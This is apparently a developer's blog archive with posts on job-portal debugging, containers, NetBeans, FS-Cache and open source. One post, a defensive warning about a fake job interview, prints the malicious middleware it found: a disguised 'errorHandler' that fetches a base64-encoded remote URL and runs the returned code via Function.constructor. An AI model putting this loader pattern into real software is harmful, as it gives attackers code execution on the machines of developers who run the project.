Monday, October 27, 2025

Debugging Microsoft's Job Portal

Or: When applying for a job becomes a technical interview you didn't sign up for

TL;DR: Microsoft's job portal had a bug that prevented me from submitting my application. After some browser console detective work, I discovered missing bearer tokens, set strategic JavaScript breakpoints, and manually set authentication headers to get my resume through. The irony of debugging Microsoft's code to apply to Microsoft was not lost on me.

I was excited to apply for a position at Microsoft. Their job portal has a nice feature: you can import your resume directly from LinkedIn rather than uploading a PDF. Convenient, right? I clicked the import button, watched my information populate, and confidently hit "Upload."

And waited. And waited.

Nothing happened. The button was stuck in a loading state, spinning endlessly.

As any developer would do when faced with a broken web app, I opened the browser's Network tab. There it was: a request to gcsservices.careers.microsoft.com that was failing. I examined the request headers and immediately spotted the problem: Authorization: Bearer undefined

Ah yes, the classic "undefined" bearer token. Someone's authentication flow was broken. The frontend was trying to make an authenticated request, but the token wasn't being set properly.

I started looking through other requests in the Network tab and found several that did have valid bearer tokens. I copied one of these working tokens for later use. Now I needed to figure out where in the code this broken request was being made.

I searched through the loaded JavaScript files and found the culprit in a minified file called main.0805accee680294efbb3.js. The code looked like this:

e && e.headers && (e.headers.Authorization = "Bearer " + await (0,
r.gf)(),
e.headers["X-CorrelationId"] = i.$.telemetry.sessionId,
e.headers["X-SubCorrelationId"] = (0,
s.A)(),
t(e))

This is where the bearer token was supposed to be added to the request headers. The r.gf function was clearly supposed to retrieve the token, but it was returning undefined.

I set a breakpoint on this line using Chrome DevTools. When the breakpoint hit, I manually set the bearer token in the console:

e.headers.Authorization = "Bearer " + "[my-valid-token]"

Then I let the execution continue. Success! The resume uploaded. Victory, right? Not quite.

After uploading the resume, I tried to click "Save and continue" to move to the next step. More failed requests.

Back to the Network tab. This time, I noticed requests failing to a different domain: careers.microsoft.com (without the "gcsservices" subdomain). These requests also had bearer token issues, but here's the twist: they needed a different bearer token than the first set of requests. Microsoft's job portal was apparently using two separate authentication systems.

I searched through the JavaScript again and found where XMLHttpRequest headers were being set:

const o = Ee.from(r.headers).normalize();

This was in a different part of the codebase handling a different set of API calls. I set another breakpoint here. Now I had a two-token juggling act: when requests went to gcsservices.careers.microsoft.com, I set Token A, and when requests went to careers.microsoft.com, I set Token B.

With both breakpoints set and both tokens ready, I went through the application flow one more time, manually adding the appropriate token at each breakpoint. After juggling between Token A for gcsservices requests and Token B for careers.microsoft.com requests, it finally worked. I made it through to the next page.


There's something deliciously ironic about having to debug Microsoft's production code just to submit a job application to Microsoft. Oh, and did I mention? I was doing all of this on a Chromebook Flex. 😄

This reminded me of last year when I wanted to buy a book from an online store. Their checkout form was broken and wouldn't let me proceed to payment. So I opened the browser console, found the validation bug in their JavaScript, bypassed it, and successfully placed my order. Apparently, fixing broken web forms has become my unexpected superpower.

To the Microsoft Hiring Team

If you're reading this:

  • Can I haz job?

Did I need to spend an hour debugging a job application portal? No. Was it more interesting than just uploading a PDF? Absolutely. And hey, if nothing else, I got a good blog post out of it.

Have you ever had to debug something just to accomplish a simple task? Share your stories in the comments!

Friday, October 17, 2025

Almost exploited via a job interview assignment

Days ago someone reached out on LinkedIn claiming to represent Koinos Finance's hiring team. Christian Muaña said they were impressed with my background and wanted me to move forward for a Senior Software Engineer position.

The technical interview email came from "Andrew Watson, Senior Engineering Engineer at Koinos" (hire @ koinos .finance) and seemed professional enough. Complete a 45-minute take-home coding assessment, push results to a public repository, share the link. Two business days. Standard tech interview stuff.

BitBucket and VMs

Andrew sent a BitBucket link to what looked like a typical full-stack React project. Frontend, backend with Express, routing, the usual. Nothing immediately suspicious.

I clicked the BitBucket link; probably not great opsec, but I do use BitBucket. Instead of cloning to my local machine though, I spun up a Google Cloud VM. Call it paranoia or good practice, but something made me want to keep this at arm's length (well, it is something crypto related).

Good thing too. I found the malicious code by manually reviewing the files. Never even ran npm install or built the project.

Middleware secrets

Buried in the backend middleware, specifically the cookie handling code, I found something concerning.

The code fetched data from a remote URL (base64 encoded) via mocki .io, then passed the response to what looked like an innocent "error handler" function. But this wasn't error handling: it used JavaScript's Function.constructor to execute whatever code the remote server returned.

const errorHandler = (error) => {

    const createHandler = (errCode) => {

        const handler = new (Function.constructor)('require', errCode);

        return handler;

    };

    const handlerFunc = createHandler(error);

     handlerFunc(require);

}

axios.get(atob(COOKIE_URL)).then(

    res => errorHandler(res.data.cookie)

  );

The moment I would have started the backend server, it would have downloaded and executed arbitrary code from an attacker-controlled server. Environment variables, API keys, credentials, sensitive files, backdoors.

A win for manual code review.

What made it work

The sophistication is what gets me. This wasn't some obvious phishing email with broken English. Professional LinkedIn outreach. Realistic assignment structure. Hosted on BitBucket, a trusted platform. Actual working React code with malicious payload hidden in middleware.

The malicious code used innocent function names like errorHandler and getCookie, tucked away in middleware where most developers wouldn't scrutinize carefully. Who thoroughly audits every line of a take-home assignment before running it?

It's targeted at developers who regularly download and run unfamiliar code as part of their job. That's the genius of it.

The obvious signs

Looking back, the red flags were there:

  • Salary range mentioned immediately.
  • Extreme flexibility: part-time acceptable, even with a current job.
  • "Senior Engineering Engineer" is redundant.
  • Two business days for a 45-minute assessment creates artificial urgency.

But the real red flag was in the code: base64-encoded URLs, remote code execution patterns, obfuscated logic in what should be straightforward middleware.

What this means

This is part of a growing trend of supply chain attacks targeting developers. We're attractive targets because we routinely download and execute code, have access to sensitive systems, and work with valuable intellectual property.

The sophistication is increasing. Not just phishing emails anymore; fully functional applications with malicious code carefully hidden where it might go unnoticed. Hosted on legitimate platforms like BitBucket for added credibility.

The thing is, the better these attacks get, the more they exploit the fundamental nature of development work. We clone repositories. We run npm install. We execute code. That's the job.

So what do you do? Review code before running it. Use isolated environments: VMs, Docker containers, cloud instances. Use Chromebooks for work! Watch for obfuscation. Be suspicious of too-good-to-be-true offers. Trust your instincts.

That nagging feeling that made me use a VM instead of my local machine was spot-on.

Your security is worth more than any job opportunity.

Thursday, October 09, 2025

The Modern Thin Client

For years, the developer community has been locked in a quiet arms race over who has the most powerful laptop. I’ve stepped off that treadmill. My setup is a modern take on the thin client, and it has made my workflow more focused, secure, and flexible.

At its heart, the principle is simple: use a lean local machine that runs only a browser, a terminal, and Visual Studio Code. The core of the work happens on a more powerful computer, which is often just another machine in my home office, accessible over the local network. I use the terminal to SSH into it, and VS Code's Remote Development to edit files directly on that remote machine. The local device becomes a high-fidelity window into a more powerful computer, and since it all runs over the intranet, my work continues uninterrupted even if the internet goes down.

This philosophy is portable. I have a Chromebook that I leave at my in-laws, perfectly set up for this. At home, my primary machine is an older MacBook Pro that runs only Chrome, Terminal, and VSCode. Both devices are just different gateways to the same powerful remote workspace.

This approach has the soul of an old-school UNIX workstation but with a modern editor. The terminal is the control center, but instead of a monochrome vi session, you get the full VSCode experience with all its extensions, running seamlessly on remote files.

A major benefit is the built-in security isolation. In a traditional setup, every script and dependency runs on the same machine as your primary browser with all its logged-in sessions. Here, there's a clear boundary: the local machine is for "trusted" tasks like browsing, while the remote machine is for "untrusted" work. A malicious script on the server cannot touch local browser data.

The most significant power, however, is the ability to scale. I've had situations where I needed parallel builds of separate branches for a resource-heavy project. A single machine couldn't handle two instances at once. With this setup, it was trivial: one VSCode window was connected to a powerful machine running the develop branch, and a second VSCode window was connected to an entirely different server running the feature branch. Each had its own dedicated resources, something impossible with a single laptop.

This model redefines the role of your laptop. It’s not about having a less capable machine, but about building a more capable and resilient system. The power is on the servers, and the local device is just a perfect, secure window into it.

Monday, October 06, 2025

Building a Dockerfile Transpiler

I'm excited to share dxform, a side project I've been working on while searching for my next role: a Dockerfile transpiler that can transform containers between different base systems and generate FreeBSD jail configurations.

The concept started simple: what if Dockerfiles could serve as a universal format for defining not just Docker containers, but other containerization systems too? Specifically, I wanted to see if I could use Dockerfiles—which developers already know and love—as the input format for FreeBSD jails.

I have some background building transpilers from a previous job, so I knew the general shape of the problem. But honestly, I expected this to be a much larger undertaking. Two things made it surprisingly manageable:

Dockerfiles are small. Unlike general-purpose programming languages, Dockerfiles have a limited instruction set (FROM, RUN, COPY, ENV, etc.). This meant the core transpiler could stay focused and relatively compact.

AI-assisted development works (mostly). This project became an experiment in how much I could orchestrate AI versus writing code myself. I've been using AI tools so heavily I'm hitting weekly limits. The feedback has been fascinating: AI is surprisingly good at some tasks but still needs human architectural decisions. It's an odd mix where it gets things right and wrong in unexpected places.

Here's where complexity crept in: the biggest challenge wasn't the Dockerfile instructions themselves—it was parsing the shell commands inside RUN instructions.

When you write:

RUN apt-get update && apt-get install -y curl build-essential

The transpiler needs to understand that apt-get install command deeply enough to transform it to:

RUN apk update && apk add curl build-base

This meant building a shell command parser on top of the Dockerfile parser. I used mvdan.cc/sh for this, and it works beautifully for the subset of shell commands that appear in Dockerfiles.

dxform can currently transform between base systems (convert Debian/Ubuntu containers to Alpine and vice versa), translate package managers (automatically mapping ~70 common packages between apt and apk), and preserve your comments and structure.

The most interesting part is the FreeBSD target. The tool has two outputs: --target freebsd-build creates a shell script that sets up ZFS datasets and runs the build commands, while --target freebsd-jail emits the jail configuration itself. Together, these let you take a standard Dockerfile and deploy it to FreeBSD's native containerization system.

dxform transform --target freebsd-build Dockerfile > build.sh

dxform transform --target freebsd-jail Dockerfile > jail.conf

It's early days, but the potential is there: Dockerfiles as a universal container definition format, deployable to Docker or FreeBSD jails.

This is very much an experiment and a learning experience. The package mappings could be more comprehensive, the FreeBSD emitter could be more sophisticated, and there are surely edge cases I haven't encountered yet. But it works, and it demonstrates something compelling: with the right abstractions, we can build bridges between different containerization ecosystems.

The project is open source and ready for experimentation. Whether you're interested in cross-platform containers, FreeBSD jails, or the mechanics of building transpilers for domain-specific languages, I'd love to hear your thoughts.

Check out the project on GitHub to see the full source and try it yourself.

Monday, September 29, 2025

Building a Claude Code Plugin for NetBeans: An Early Look

I've started working on a personal project to integrate Claude Code directly into the NetBeans IDE. It's still in the early stages, but there's enough progress to share a look at how it's taking shape.

As someone who contributed to NetBeans in the past (starting with Sun Microsystem days, up to the early Apache Software Foundation years and with my old OpenBeans distribution), it's interesting to be tinkering with the platform again in this new context of AI-assisted development.

Current Progress

The basic integration is working. The plugin can now:

  • Respond to most tool calls
  • Track and send your current code selection, updating Claude when you change it

This provides the foundation for contextual conversations about your code. Most of the core MCP (Model Context Protocol) tools are implemented, allowing Claude to interact meaningfully with the project workspace.

Interestingly, I'm building much of this with Claude Code itself. While I handle the architecture and inevitably fix things when they go off track, it's been a practical test of using the tool to build its own integration.

Current Focus: Refining the Integration

Right now, I'm focused on the finer details of the MCP protocol implementation. The public documentation covers the concepts well, but getting all the JSON schemas precisely right for a robust integration requires some careful attention.

What makes this particularly interesting is that unlike many modern protocols, Claude Code's MCP flavour isn't fully open—and neither are the official plugins for editors like VSCode and IntelliJ.

To help with development, I created a WebSocket proxy library—ironically, with Claude's help—which has been useful for observing the data flow and debugging the communication layer.

Looking Ahead

This remains a side project, driven by personal interest in both NetBeans and AI tooling. The goal for now is to create a solid, functional plugin that I'd be comfortable using.

If you're a NetBeans user curious about AI-assisted coding, I'd be interested in your thoughts. What would make a tool like this most useful in your workflow? I'm continuing development and will share updates as there's more to show.

If you're curious about the code or want to follow along, the project is on GitHub.

Friday, September 26, 2025

Scaling AI Workloads: Using Linux FS-Cache to Serve Giant Models from Network Storage

Working with multi-gigabyte LLM and diffusion model files presents a practical challenge: local storage is fast but limited, while network storage is capacious but slow. This is especially true for compact workstations like a Mac Mini or a laptop with a small SSD, where fitting several large models is impossible.

What if you could get the best of both worlds—the speed of local storage for active models and the limitless capacity of a network share? Instead of copying files back and forth, we can use a transparent caching layer built right into the Linux kernel.

The Bottleneck: Network Latency vs. Model Size

The standard approach of mounting a network drive (NFS or Samba/CIFS) containing your model repository solves the storage problem but introduces a performance penalty. Loading a 10GB model over a network, even a fast one, can cause significant delays. This slows down experimentation, hinders rapid model switching, and creates a frustrating development cycle.

The solution isn't to fight the network but to smartly use local storage as a massive read-cache for the remote filesystem. Enter FS-Cache.

FS-Cache: The Hidden Gem for Accelerating Network Filesystems

Linux has long included a powerful, filesystem-agnostic caching layer called FS-Cache. Originally designed for environments like NFS, its utility for AI workloads is profound. The concept is simple:

  1. The first time a model file is read from the network, it is silently stored in a designated cache on a local disk (ideally an SSD).
  2. Every subsequent read for that file is served directly from the local cache at drive speeds, bypassing the network entirely.

This means the second time you load "llama2-7b.Q4.gguf," it feels instantaneous.

Implementation: A Two-Step Setup

The beauty of this system is that it requires no changes to your applications. PyTorch, TensorFlow, or any other tool that reads files will transparently benefit.

Step 1: Configure the cachefilesd Daemon

The kernel provides the caching engine, but you need a userspace manager for the cache directory. This is handled by cachefilesd.

  1. Install it: sudo apt install cachefilesd (on Debian/Ubuntu).
  2. Edit /etc/cachefilesd.conf to point dir to a directory on your fast local drive (e.g., dir /var/cache/fscache). Ensure it has enough space for your active set of models.
  3. Start and enable the daemon: sudo systemctl enable --now cachefilesd.

Step 2: Mount the Network Share with the fsc Flag

Now, mount your network share containing the models with the special fsc (filesystem cache) option.

For a CIFS/Samba share:

sudo mount -t cifs //ai-server/models /mnt/models -o username=user,password=pass,fsc

For an NFS share:

sudo mount -t nfs ai-server:/models /mnt/models -o fsc

That's it. Any file read from /mnt/models is now eligible for caching.

Pro Tip: Pre-Warming the Cache for Instant Results

While the cache populates naturally during use, you can pre-load specific models to eliminate the first-load penalty entirely. This is perfect for preparing a model before a demo or a critical training run.

Simply read the file through the mount point:

cat /mnt/models/llama2-7b.Q4.gguf > /dev/null

This command will pull the entire model file through the kernel's FS-Cache layer, populating the local disk cache. The next time your Python script opens that file, it will be read from the local SSD at full speed.

Conclusion

Using FS-Cache transforms your workflow. It allows a small, fast local disk to act as a high-speed front-end to a vast, centralized model repository on a network server. This setup is not just for media files; it's a pragmatic and powerful solution for managing the growing size of AI artifacts, making it easier to scale your development environment without upgrading every machine's storage.

Tuesday, June 14, 2022

The Trouble with Harry time loop

I saw The Trouble with Harry (1955) a while back and it didn't have a big impression on me. But recently I rewatched it and was amazed at how odd time seems to flow, how somewhat confused people are, as if they have memory problems.

This review goes into detail about the movie, but I wanted to focus on a single riddle in the movie. It's this exchange with the kid:

Arnie: Why haven't you visited before?
Sam: Perhaps I'll come back tomorrow
Arnie: When's that?
Sam: Day after today.
Arnie: That's yesterday, today is tomorrow.
Sam: It was.
Arnie: When was tomorrow yesterday, Mr. Marlowe?
Sam: Today.
Arnie: Oh, sure. Yesterday.

Arnie seems to be the only one that remembers reliving days. Every adult just has slight confusion at times; forgetting things or having unexplained familiarity with each other.

We learn from this exchange the loop is not identical (Sam never visited before). But time does not flow properly since Arnie has learned not to expect that tomorrow will just come the next day ("When's that?").

Actually, Arnie knows that the day after the present day is... "yesterday"; the loop restarts. If anything it looks like the present day is something entirely new to Arnie. It's finally a "tomorrow".

My impression is that the loop had a single day until now. It was "yesterday" on a loop. The present day is finally a "tomorrow".

Sam and Arnie obviously talk about things from different perspectives. Maybe Sam has a slight intuition about things (being an artist) but only Arnie knows about the loop. So, it's not clear what Sam means when he says "It was".

Anyway, this puzzles Arnie which asks "When was tomorrow yesterday, Mr. Marlowe?"

Now, Sam answers "Today". This may just be related to the talk they had: Arnie mentioned that the day after today is yesterday so, today is the day when yesterday will come tomorrow.

But then Arnie thinks about the question he just asked and finds his own answer: in the previous loop of yesterday tomorrow was always yesterday.

It almost looks like the timeline was: Yesterday1, Yesterday2, ..., Yesterday N, Today (brand new).

Based on the ending we know the adults intently do a time loop: leave Harry in the forest for Arnie to find again. The mother even says: "Go on, Arnie, run home and tell me about it" and Miss Ivy Gravely repeats "Please Arnie, run home and tell your mother".

So, the timeline is: Yesterday 1, Yesterday2, ..., Yesterday N, Today1, Today 2 (new loop).

It does not look to me that time is going in reverse. It looks to me like there's a daily loop that doesn't progress until things are settled.

Going back to the missing piece: Sam says "it was" suggesting today was tomorrow. Assuming this is the 1st day in the new loop, it does make sense indeed: today was yesterday's tomorrow, but since they are entering another loop there will not be another new day, just today on repeat.

The riddle is interesting because of there's no language to express time loops properly. "Tomorrow" may mean the day following the present day which may be a re-run or loop or "tomorrow" may be the day naturally following current events. A more proper (but dry) phrasing would be:

Arnie: Why haven't you visited in any of the (repeated) days I remember?
Sam: Perhaps I'll come back tomorrow.
Arnie: When will we get to live tomorrow?
Sam: Day after today.
Arnie: After today we will relive yesterday, today is a new day following the yesterday loop.
Sam: But the next day won't be new.
Arnie: When did we live the day before yesterday, Mr. Marlowe?
Sam: [Nonsensical response.]
Arnie: [Gets confused.] Oh, sure. We continuously relived yesterday.

Monday, August 03, 2020

Saturday, July 04, 2020

The Geek and the pseudo inclusive peer pressure

Discrimination based on social skills and social groups exists and geeks experience it a lot.

One facet of it is the pseudo inclusive peer pressure.

The desire to belong to a group is strong in anyone so people would accept many things just to fit in.

At the same time, a few understand this game quite well, can get meta about it and specifically target geeks to mock them by appearing to be inclusive.

Nothing causes more pleasure to such dark 'master minds' than tricking a geek into ridiculing itself!

Not only for the ridicule but for the mere fact that the geek believed they would thus become part of the in-group: this was never on the table! They will never be part of the in-group!

After a few such experiences some geeks develop a good sense for this situation.

There is no surprise then that some react quite hard in the grown up world. Their senses are screaming: it's a trap!

But the master minds are also grown ups now, and they want small things, all in the name of being inclusive.


Tuesday, June 30, 2020

Open Source sustainability is not about the individual

There was a lot of buzz a while back about Open Source sustainability. Small and large companies as well as individuals discovered it's near impossible to survive financially doing Open Source.

It occurred to me that this might be an emergent property of Open Source and a reason why many foundations (like Apache) as well as users intuitively look at the "community" first.

The community is like a swarm, a Redundant Array of Individual Contributors (RAIC) that carries on regardless if a particular individual drops out. So, a "good" Open Source project is one where the community achieved this chain reaction while the others are at a stage where individual contributors make or break the project.

This conclusion is quite ruthless about a specific company or individual though: the better your Open Source project is, the more precarious your position.

The role of BDFL (Benevolent dictator for life) might be the only one guaranteeing some stability for an individual, but this means the swarm can only sustain one queen (I mean, dictator). Conceptually this role might be required to provide some coherence to the swarm.

Thursday, June 04, 2020

Instant Thought: another open source supply chain attack

It seems not a day goes by without another open source supply chain attack.

The latest, uncovered by the security researcher "JK" is called "Instant Thought" and was noticed in the most popular Java IDE, combined the the very popular build system Gradle.

One might assume that just opening a Gradle project to read the source code is a safe operation, but Instant Thought shows this is not the case.

Gradle projects might have an unassuming settings.gradle file with a tiny block which gets executed by the IDE as soon as the project is loaded.

Root cause analysis showed the problem is the gradle.projectsLoaded hook which is able to run code with the full permissions of the user account:

gradle.projectsLoaded { g ->
  // do bad things
}

"This is not unlike the Word macro viruses seen in late '90s" said another analyst. "Which just shows how behind the times the IDEs are with security".

It is not clear how widespread Instant Thought is but suffice to say developers have to think long and hard before executing or even opening unknown projects.

According to the vendor, this is a low priority issue: "[Our IDE] automatically configures the project during the import (which is quite similar to executing gradle command) and it causes the code execution. The current behaviour seems not to be a high severity security problem thus it won't be fixed in the near future."

Thursday, January 23, 2020

Roam Like at Home is a regression for Romania

On June 15th 2017 the EU launched "Roam Like at Home", a set of rules that removed roaming charges. It was a great idea to harmonise telecom infrastructure and remove another invisible border separating people within the EU.

Romania was hit particularly bad by these rules. They introduced new borders where before there were none.

Previously, roaming was available to any telecom user either on a subscription plan or on a pre-paid card in Romania. The only limitation was that, rarely, the operator might ask for a warranty (say, 100 euro) so you don't rack up too many fees while abroad.

Internet and mobile services are particularly cheap in Romania and fast. We used to be ranked on the 5th place world wide based on internet speed alone.

So, by having such cheap prices a problem for Romanian telecom operators was that this might encourage abuse from Romanians going abroad and downloading too much, or by other EU people buying Romanian SIM cards to use instead of their expensive national SIM cards.

In order to contain this potential problem the EU was flexible with the "Roam Like at Home" rules and allowed a "fair use policy".

But the biggest blow was that the EU allowed contracts without roaming services. Guess what all Romanian telecom operators started rolling out immediately? They removed roaming from all the subscription plans under a price they considered acceptable!

A reasonable, entry-level, subscription plan that would have had roaming before 2017 suddenly became useless when crossing the border.

Note that without roaming nothing works! You have no data but no calls or SMS either. You are stranded with a non-functioning telephone in another EU country. This was an "interesting" experience for Romanian tourists early 2018. All they could call is 112.

Getting roaming temporarily on a subscription plan is just not possible anymore. Either you upgrade the whole plan to a more expensive one, forever, or you have no phone abroad.

A pre-paid card has more advantages. You can activate a more expensive roaming plan at any time, but you are still penalised by losing all the benefits you had until then, regardless how much the 'national' plan costed or how much you used from it.

In conclusion Roam like at Home reduced the quality of the telecom offer in Romania and introduced a quite visible border separating Romanians from the rest of the EU. One cannot imagine under what scenario the concept of 'roaming services' for SIM cards sold within the EU to EU citizens should even exist.

Another change that this measure did introduce in Romania is a bigger churn on SIM cards and operators. If Romanians manage to separate their identity from the SIM number and the operator is just a dumb carrier then it will not have been all for nothing.

Friday, August 16, 2019

Wayback Machine Downloader

Internet Archive's Wayback Machine is a gift to the world. For quick checks you just enter the URL and you get the archived version going years back.

A whole little cottage industry seems to have been formed around the Wayback Machine. They offer you whole-site download and conversions for the low price of $5 or $15 or $45 or however much they can convince you their service is worth.

Among these busy bees, the free Ruby based Wayback Machine Downloader is a little gem.

You just install it then run

wayback_machine_downloader -c 10 -s http://www.example.com

and you get everything! Total cost: $0.

Installing the actual gem on macOS as a non-admin user seems to have contradicting info online. There's a `gem install --local` command but it doesn't seem to do what one expects -- installing in the home folder of the current user.

What did the trick for me was:

gem install -i ~/.gem/ruby/2.3.0/ wayback_machine_downloader

and this after I manually downloaded the proper .gem file from rubygems.org

Some were even recommending to add a http (versus the default https) source to gem but that seemed foolish and even gem itself complained about using http in 2019.

Whatever road you pick with downloading from Wayback Machine, remember all the work the Internet Archive is doing for all this to be available to you and donate to them.

Saturday, June 08, 2019

Fair Source and the Fair Source Initiative

There's been some uproar about the MongoDB Server Side Public License which tries to prevent cloud vendors like Amazon take all the money in the MongoDB market.

Many are pointing out that this new license does not respect the Open Source Definition published by the Open Source Initiative.

In truth many users and companies would find the license acceptable. A legal advisor will clear the license, the software will be used and nobody except a vendor in a similar position like Amazon will care.

What this move towards a financially sustainable open source ecosystem needs is branding.

I suggest calling this new type of open source "fair source". Most people and companies understand that some money is necessary to keep a project alive and would find it palatable that the once you are big enough to disrupt the market for the author you should pay.

In order to help smaller companies that do not have a legal advisor at hand, a Fair Source Initiative foundation should be created. This foundation would review such fair source licenses and define them as acceptable or not.

In many ways in the same way as "open source" was introduced to make free software more acceptable to businesses, "fair source" will be about making an open source business model more sustainable.

Open Source was about dethroning the Free Software Foundation. Fair Source must dethrone the Open Source Initiative.

Perhaps the Open Source Initiative board will realize this and redefine the way they classify licenses. Otherwise they will find themselves irrelevant for a buzzing section of the software world.

Saturday, April 27, 2019

Apache NetBeans interview

As Apache NetBeans became a top level Apache project and finished the incubation process I was asked for an interview and my photo.

Only a single quote was taken from the interview and used on a not too positive article about NetBeans. The quote was presented as coming from me as a member of the 'Project Management Committee' to give it even more weight.

Bellow is my full interview for historical reference:

> Do you think Apache is the best place for NetBeans?

Churchill said that 'democracy is the worst form of Government except for all those other forms that have been tried from time to time'.

In the current context, there is no better place.

Maybe in some alternate universe Sun Microsystems didn't spend a full $1 billion on MySQL but took a chunk of that to create a NetBeans Foundation that rivals the Eclipse Foundation... but I'm not entirely certain it would have been better for the project.
 

> What kind of future do you anticipate for NetBeans under Apache?

This depends on how Apache and the other Apache projects value NetBeans. There is a lot of integration that would help both the projects and the end users.

The ASF is a large Java house now so having a programming language (Groovy), an IDE (NetBeans), build systems (Ant, Maven) and application runtimes (Tomcat, TomEE) means you can do some interesting things in sync.

If you think about it, the IDE is the last major piece of the puzzle missing from Apache. So now, you can push a new feature all the way to developers using the IDE really easy.

Imagine you want to introduce, say, reproducible builds to the Java developer world. Well, you change the build systems, have the runtimes also reproducible then push this to the default project types in the IDE and suddenly all new Java projects created by developers using the IDE are reproducible. You can really change and educate the world really fast.

And education is not to be understated. An IDE suggestion that the developer sees *while editing code* is educational. Want people to use libraries better? A blog post might help, but people have to find it and read it. But if a suggestion about how to use the library better is part of NetBeans, all developers will see it!

It's not clear to me yet if the ASF takes such a holistic approach, but there's a big opportunity here. Everything fits.
 

> What will your project management committee do to advance NetBeans?

This is a hard question for me since I'm not the 'manager' of NetBeans. Nobody is. The whole point under Apache is to participate as individuals, regardless of the employer (that might sometimes be sponsoring said involvement).

So, I don't necessarily see hard targets like under a strictly hierarchical corporation.

Changes happens somewhat chaotically but towards betterment. Many people submit specific bug fixes for their particular problems while other work on more big picture changes (like a new Java version being supported, etc).

On the Java front we have a lot of community members that work on it, a few of them full time as part of their job at Oracle. On PHP we also have some folks, particularly Jun-ichi Yamamoto from Japan. JavaEE is also quite popular. We had people add support for JUnit 5, etc.

Basically the community will self-organize to overcome obstacles. We had somebody fix a really hard bug in the Java profiler. I would have thought that only a handful of core Java developers from Oracle knew how to fix that. But the individual looked into it, worked hard and fixed it! There's a lot of hidden talent like that.
 

> Also, what is the role of the committee?

See https://www.apache.org/foundation/governance/pmcs.html

The PMC decides which new committers get added (which in turn decide how the code is changed) and then votes when a release is to be made as an act of the Apache foundation. We also oversee how the NetBeans trademark is used and basically take care of the NetBeans project and brand as a whole.

> Thank you very much!

No problem. BTW, the individual doing the hard Profiler bugfix I mentioned is called Peter Hull.

Thursday, April 04, 2019

The Apache Software Foundation is a record label not a rock band

What shocked me most during my involvement with NetBeans, now an Apache Software Foundation project, is that The Apache Software Foundation is a record label not a rock band.

Imagine you like a given band. You go to their concerts regardless of the location, enjoy their music, buy their records, maybe proudly wear a T-shirt. You deeply care about that band and the band cares about the music they make and their fans.

Once your band joins The Apache Record Label things might seem unchanged. The band still makes good music, released obviously exclusively through their new record label.

But something did change: while the band and the fans care about their future, the record label has a lot of bands to look after and only tangentially cares about a particular band. The band is also not doing much better since all their sales go towards the maintenance of the main music venue, lawyers, trademark protection, distribution fees, etc.

The misunderstanding about The Apache Software Foundation must have been caused by the fact that initially the Foundation was about a big and important project: the Apache HTTP Server. At that time I believe the fate of the project was quite important. Nowadays I believe the Foundation could retire the Apache HTTP Server and survive unscathed.

The other misunderstanding is caused by the fact that the technology landscape has some other software foundations like the FreeBSD Foundation, the OpenBSD Foundation, Mozilla Foundation which are all about a single project. These foundations basically live and die by that project.

It's an odd situation. The Apache Software Foundation provides competent support for its projects but has no skin in the game and if a project fails they will eventually acknowledge it in a board meeting and move on.

There's also no way to directly support a project via the Apache Software Foundation. The Foundation does not sponsor any kind of project software development. All the donations go to infrastructure and administrative costs. But projects rarely hurt for infrastructure while targeted development could help them and their users a whole lot.

Sunday, August 26, 2018

NetBeans Web Toolkit

I'm exploring NetBeans Web Toolkit with the articles here

NetBeans Web Toolkit is the new name I'm trying to give to Jaroslav Tulach's HTML/Java API, a rather impressive library that deserves more use.


Friday, March 02, 2018

Guards in Java

Haskell functions have this nice concept called 'guards' which allow you to define a condition and return a value when that condition is true.

For example:

abs n
  | n < 0     = -n
  | otherwise =  n

This makes the code rather readable, especially when you have more guards.

Guards build one upon another since you know that if your guard condition is checked, all the other failed:

something n
  | n < -2 = 10
  -- bellow we know that n > =-2
  | n < 0 = 8
  | otherwise = n

Back in Java land, where I get paid, I sometimes wondered if I should write a method as:

X method(Y param) {
  if (!param.isSomething()) {
    return null;
  } else {
    return param.getX();
  }
}

or if I should write it as

X method(Y param) {
  if (!param.isSomething()) {
    return null;
  }

  return param.getX();
}

I generally prefer the 2nd variant and now I realised these are a form of function guards!



Wednesday, October 04, 2017

The case of the different jsch 0.1.54 binaries

As part of the Apache NetBeans IP clearance we are combing through all the code and dependencies.

One interesting thing we bumped into was that the jsch 0.1.54 binary JAR we are using has a different hash (and size) than the binary JAR from Maven Central.

The old hash is 0D7D8ABA0D11E8CD2F775F47CD3A6CFBF2837DA4, the new one is DA3584329A263616E277E15462B387ADDD1B208D.

The binaries are 278,612 bytes vs 280,515 bytes in Maven Central.

Our version is actually the same as the one found on http://www.jcraft.com/jsch/

Also, the Maven JAR is properly signed with the author's CA7FA1F0 key.

This is where it becomes clear that reproducible builds are important. You do not want to have to wonder why a binary differs, especially years later when you are doing a review. And this one is a library doing SSH!

So, why the different binaries?

It seems the original JAR was compiled on Aug 30, 2016 with Java 1.4 (major version 48) while the Maven Central JAR was compiled Sep 3, 2016 with Java 5 (major version 49).

The original JAR also concatenates strings using StringBuffer while the Maven Central JAR uses the newly introduced in 1.5 StringBuilder. Which should also be a bit faster since it's not synchronized.

Next, most of the cypher classes use some reflection via a static static java.lang.Class class$(java.lang.String) method.

What is this? It's just the way class literals worked in Java 1.4. As explained here, in Java 5 the ldc_w instruction was introduced to load a Class object.

In 1.4 the class literal was helped by the compiler by actually introducing the helper Class class$(java.lang.String className) method and replacing the Person.class with a class$("Person") call.

It conclusion, it seems that excluding the Java 1.4 to Java 5 compiler changes, the two JARs are identical. With the Maven Central JAR even a bit better due to StringBuilder being used.

There is no check so far that the sources do produce the specific JAR. This is an exercise left for the reader.

Note: I have also cross-posted this blog post to the Apache NetBeans blog.

Findus and the Christmas Tomte

Sven Nordqvist's Pettson and Findus series is beloved for its cozy portrayal of rural Swedish life. An eccentric old farmer, his talking...